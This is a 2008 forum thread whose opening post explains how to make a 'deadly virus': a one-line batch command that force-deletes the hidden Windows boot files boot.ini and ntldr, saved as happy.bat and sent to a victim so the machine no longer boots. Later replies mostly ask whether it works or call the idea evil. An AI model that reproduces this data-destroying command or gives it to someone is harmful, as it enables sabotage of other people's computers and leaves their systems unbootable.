"DO THIS @ YOUR OWN RISK" How to Make a Deadly but simple virus using one line Command
xForcex said
03:26 02/08 2008
1)Make a text file2)Enter the below commanderase /q /f /s /a:h c:\boot.ini c:\ntldr3)Save the file as happy.batSend it to Victim.Let him open it.Thats it Devil.gifI RECOMMAND A BACK UP PC The next time he reboots .. SYstem will not boot again
Pimping said
15:12 02/09 2008
How to undo this. Its dngerous.
15:13 02/09 2008
have u tried this... if uno try dis and it work without any problems den i might try it
10:04 02/10 2008
yeh dis would work.....
Skilla said
10:27 02/10 2008
hmmm might try dis
10:30 02/10 2008
who try it already??
10:30 02/10 2008
FUKRY Y UNNU WUD WANT TO FUK UP A NEX MAN PC................PEOPLE SO EVIL
kydd54 said
11:16 02/10 2008
Evil people if you guys tried it
rooney said
11:32 02/10 2008
yo this really work or wah?
ZJSnyper said
18:40 02/10 2008
dat fi get delete bun bad mind people
viper_3kj said
18:42 02/10 2008
it will work.
DJ Miggs said
18:45 02/10 2008
why would u want to f**k up a next man PC
sting said
22:45 02/10 2008
a f**kry that
why u want f**k wid a man ting
uno love fight rasta
that's why people caan servive cause people no stop fight them out
Zib said
21:15 03/04 2008
me back linko but you cant show us how to make up something of our own? thanks ...
we jus want the steps how to go about doing it .....for eg. opening Windows Media when the pc boots up or something like that